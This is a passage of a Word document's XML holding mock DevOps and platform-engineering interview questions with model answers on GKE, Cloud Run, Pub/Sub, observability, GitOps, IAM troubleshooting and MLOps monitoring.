        <w:t>Q7. Observability: An alert says p95 latency increased from 200ms to 2s after a deployment. How would you investigate using Prometheus, Grafana, Cloud Logging, logs, and traces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First confirm the timing correlation between the deployment and the latency spike precisely, then check distributed traces for the affected requests to see which specific span (application code, a downstream call, database query) accounts for the added time. Cross-reference with Prometheus/Grafana dashboards for resource saturation (CPU throttling, memory pressure, connection pool exhaustion) that might explain a code-level regression, and check Cloud Logging for new error patterns or slow-query logs that appeared coincident with the deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Kubernetes probes: How would you design readiness, liveness, and startup probes for a slow-starting service to avoid cascading failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a startup probe with a generous failure threshold to give the slow-starting service enough time to initialize before liveness/readiness probes even begin evaluating it, preventing Kubernetes from killing a container that's simply still starting up. Configure the readiness probe to genuinely reflect whether the service can handle traffic (checking real dependencies, not just 'process is running'), and keep the liveness probe conservative (only failing on true deadlock/hang conditions) since an overly aggressive liveness probe causes unnecessary restarts that can cascade into a crash loop under load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 7 - GCP Networking and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. GKE troubleshooting: A critical service on GKE has intermittent 5xx errors during traffic spikes. Walk me through your debugging approach from load balancer to pod-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check load balancer backend health and latency metrics first to see if the errors originate there (unhealthy backends during a spike, often from insufficient replicas) versus at the application layer. Check HPA scaling behavior - if pods aren't scaling fast enough to absorb the spike, requests queue and time out - and check pod-level CPU/memory saturation and any connection pool limits (database, downstream services) that could be the actual bottleneck once traffic exceeds current capacity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Cloud Run security: How would you expose an internal Cloud Run service securely using IAM, ingress settings, VPC connector, load balancer, and service-to-service auth?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set Cloud Run ingress to 'internal' or 'internal and load balancing' so it's not reachable from the public internet directly, and require IAM authentication (not allUsers) so only explicitly authorized service accounts can invoke it. Use a Serverless VPC Access connector if the service needs to reach VPC-internal resources, and for service-to-service calls, use signed ID tokens from the calling service's identity so the receiving Cloud Run service can verify the caller's identity rather than trusting network position alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Pub/Sub incident: A downstream service outage caused Pub/Sub backlog. How would you recover safely without overloading dependencies or losing messages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Let messages accumulate in the subscription (Pub/Sub retains unacked messages up to the configured retention period) rather than dropping them, and once the downstream dependency recovers, ramp consumer concurrency up gradually rather than processing the entire backlog at max speed immediately, which could overwhelm the just-recovered dependency again. Monitor the downstream service's health metrics during backlog drain and throttle consumption if it shows signs of stress, and verify no messages were lost by checking the subscription's message count trends before and after.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. GKE expert: You are asked to design a production GKE platform for multiple product teams. How would you structure clusters, node pools, namespaces, IAM, networking, and deployment ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a shared cluster per environment (or region) with namespace-per-team isolation enforced by ResourceQuotas, NetworkPolicies, and RBAC scoped to each team's namespace, rather than a cluster per team unless strong isolation genuinely requires it. Structure node pools by workload characteristics (general-purpose, GPU, spot-tolerant batch) shared across teams for efficiency, centralize networking via Shared VPC, and give each team ownership of their namespace's deployments through GitOps while the platform team owns cluster-level configuration and upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Commitment planning: How would you decide whether to buy committed use discounts or reservations for GKE/Compute workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Analyze historical usage trends to identify the stable, predictable baseline load (a good candidate for committed use discounts) versus the variable, spiky portion (better served on-demand or with spot instances), and commit only to the baseline you're confident will persist for the commitment term, since over-committing locks in cost without the usage to justify it. Review commitment utilization regularly and adjust future purchases based on actual growth versus forecast, treating it as an ongoing FinOps practice rather than a one-time decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. OpenTelemetry: How would you roll out OpenTelemetry across services and connect traces, metrics, logs, dashboards, and alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Roll out incrementally starting with the highest-traffic or most operationally important services first, using auto-instrumentation where available to minimize per-service code changes, and standardize on consistent resource attributes (service name, version, environment) so telemetry correlates correctly across services. Route all signals through an OpenTelemetry Collector to a unified backend so traces, metrics, and logs can be correlated by trace ID, and build dashboards/alerts on top of that unified data rather than maintaining separate, disconnected tooling per signal type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud DNS: A production service intermittently resolves to an old endpoint. How would you debug DNS TTLs, Cloud DNS records, caches, split-horizon DNS, and client behavior?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the actual TTL configured on the DNS record first - a long TTL means clients and resolvers legitimately cache the old value for that duration after a change, which is often the real cause rather than a DNS bug. Verify the Cloud DNS record itself is correct and fully propagated, check for split-horizon DNS misconfiguration if internal and external resolution differ unexpectedly, and check client-side DNS caching behavior (some client libraries or OS-level resolvers cache more aggressively than the TTL suggests) as a separate layer to rule out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. AlloyDB design: When would you choose AlloyDB over Cloud SQL, and what operational considerations would you discuss for HA, backups, scaling, and cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose AlloyDB when you need significantly higher performance for PostgreSQL-compatible workloads (AlloyDB's columnar engine accelerates analytical queries substantially) or need better read scalability with its read pool architecture; choose Cloud SQL for simpler, lower-cost workloads where AlloyDB's added capability isn't needed. Operationally, both support automated backups and HA configurations, but AlloyDB's architecture (separating compute and storage) changes how you think about scaling reads independently of writes, and its cost profile is generally higher, so the decision should be justified by an actual performance or scale requirement, not used as a default upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 8 - Platform Engineering and DevEx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. GitOps: How would you implement GitOps with ArgoCD for Kubernetes workloads across dev, staging, and production while keeping rollbacks and approvals safe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure a Git repo (or App-of-Apps pattern) with one ArgoCD Application per environment pointing to environment-specific overlays (Kustomize or Helm values), so promotion from dev to production is a Git merge/PR rather than a separate deployment mechanism. Require PR approval for changes to production overlays, use ArgoCD's automated sync only for lower environments while keeping production sync manual or gated behind an approval, and rely on Git history for rollback - reverting a commit and letting ArgoCD reconcile is inherently safe and auditable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Policy as code: How would you use Sentinel, OPA, or policy validation to stop risky GCP changes before apply while keeping developer experience smooth?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run policy checks against the Terraform plan JSON in CI before apply, evaluating rules like 'no public ingress on sensitive ports' or 'all resources must have required labels', and fail the pipeline with a clear, specific error message pointing to exactly what needs to change. Keep the developer experience smooth by starting new policies in warn/audit mode before enforcing, and providing a fast, well-documented exception process for legitimate edge cases so policy doesn't become a blocker teams route around.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. DNS migration: How would you migrate DNS zones with minimal risk, and how would you plan TTLs, validation, rollback, and monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lower the TTL on records well before the migration window (so any rollback or correction propagates quickly), validate the new DNS provider's records match exactly using a diff against the old zone, and cut over gradually if possible (partial traffic shift) rather than all at once. Monitor resolution success and application error rates closely during and after cutover, and keep the old DNS provider/zone configuration intact and ready as an instant rollback option until the new setup has proven stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Container runtime security: What runtime security controls would you consider for Kubernetes workloads beyond image scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Beyond scanning images before deployment, add runtime controls like seccomp/AppArmor profiles to restrict syscalls, a read-only root filesystem where possible, dropped Linux capabilities (not just non-root), and network policies limiting lateral movement if a container is compromised. Consider runtime threat detection (Falco or a similar tool) that alerts on anomalous in-container behavior - unexpected process execution, file access outside expected paths - since image scanning only catches known vulnerabilities at build time, not runtime exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Incident postmortem quality: What makes a postmortem high quality, and how do you ensure action items actually get completed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A high-quality postmortem is blameless, includes an accurate timeline, digs into systemic root cause rather than stopping at the immediate trigger, and honestly assesses what went well and what didn't in the response itself, not just the technical failure. To ensure action items complete, assign a specific owner and due date to each one, track them in the same system as regular engineering work (not a separate forgotten document), and review overdue postmortem action items in a recurring forum with visibility to leadership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. ML monitoring tools: How would you combine Vertex AI Model Monitoring, Prometheus, Grafana, MLflow, and Evidently-style checks in one production monitoring design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Vertex AI Model Monitoring for GCP-native prediction drift and skew detection tied directly to deployed endpoints, Prometheus/Grafana for infrastructure and serving-layer metrics (latency, throughput, resource utilization), MLflow for tracking experiment lineage and linking a production model back to its training run, and Evidently-style checks for deeper statistical drift/data-quality analysis that you can run on a schedule against production data. Unify alerting so any of these systems can trigger the same incident response path rather than living in separate silos nobody checks consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Platform roadmap: What would your first 90 days look like as a senior platform engineer joining a product company?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The first 30 days focus on listening and mapping - understanding current pain points, talking to teams the platform serves, and auditing existing infrastructure and processes without changing anything yet. Days 30-60 involve picking one or two high-impact, achievable improvements (often something already identified as painful) to build credibility and trust through a visible early win, and days 60-90 shift toward a longer-term roadmap informed by what was learned, presented with clear priorities and tradeoffs to stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Drift detection: How would you detect and reconcile drift between Terraform state, real GCP resources, and manual console changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run scheduled `terraform plan` jobs in CI against every workspace and alert when a non-empty diff appears, since that indicates drift between state and reality. Investigate whether the drift came from an unauthorized manual console change (reconcile by applying Terraform to restore the intended state, or importing the change if it was legitimate) versus a genuine out-of-band necessity, and restrict console write access for resources managed by Terraform to reduce how often this happens in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 9 - MLOps and AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. MLOps fundamentals: Explain the end-to-end ML lifecycle and where DevOps responsibilities become different from traditional application delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The ML lifecycle spans data collection and validation, feature engineering, model training and evaluation, deployment, and ongoing monitoring for drift - with a feedback loop back to retraining that traditional application delivery doesn't have. DevOps responsibilities differ because 'correctness' isn't just whether the code runs, but whether the model's predictions remain accurate over time as real-world data shifts, which requires monitoring data and prediction distributions in addition to standard application health metrics, and versioning data and models alongside code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. GKE multi-tenancy: How would you design namespace isolation, quotas, RBAC, network policies, admission controls, and observability for many teams in one cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Give each team a dedicated namespace with ResourceQuotas and LimitRanges sized to their needs, RBAC RoleBindings scoped strictly to that namespace, and default-deny NetworkPolicies with explicit allow rules for legitimate cross-namespace traffic. Enforce baseline security standards (non-root, resource limits required) via admission controls like Gatekeeper or Kyverno applied cluster-wide so no team can opt out, and provide per-namespace observability dashboards so teams can self-serve visibility into their own workloads without needing cluster-admin access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Trace sampling: How would you choose tracing sampling rates and make traces useful for debugging high-volume services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a lower sampling rate for high-volume, healthy traffic to control cost and storage, but always sample 100% of traces that contain errors or exceed a latency threshold (tail-based sampling), since those are exactly the traces you need for debugging and a random low-rate sample would likely miss them. Ensure sampled traces include enough context (all relevant spans across services, not just the entry point) to actually be useful for root-causing an issue, not just confirming a request happened.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. IAM troubleshooting: A workload gets permission denied only in production. How would you debug IAM policy, service accounts, Workload Identity, org policy, and audit logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Compare the exact service account and IAM bindings between the working environment and production first, since a permission-denied-only-in-production issue is usually an environment-specific difference, not a code bug. Check Workload Identity bindings are correctly mapped for the production namespace/service account, verify no org policy constraint is more restrictive in the production project/folder, and check Cloud Audit Logs for the specific denied call to see exactly which permission was missing rather than guessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Platform API: If you expose self-service infrastructure through an API, what validations, approvals, and audit trails would you build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Validate every request against schema and policy checks (quota limits, naming conventions, allowed resource types) before provisioning, and require an approval step for anything above a defined risk threshold while allowing routine, well-understood requests to auto-approve. Log every request, decision, and outcome with who made it and when, so the audit trail can answer 'who created this resource and under what approval' months later without needing to reconstruct it from memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Log correlation: How would you design correlation IDs and structured logging across microservices and async Pub/Sub workflows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Generate a correlation/trace ID at the entry point of a request and propagate it through every synchronous call via a standard header, and explicitly carry it through asynchronous hops by embedding it in Pub/Sub message attributes, since it won't propagate automatically across a queue. Use structured (JSON) logging everywhere with the correlation ID as a consistent field name, so a single query across all services' logs reconstructs the full request/event flow even when it spans both synchronous and asynchronous legs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
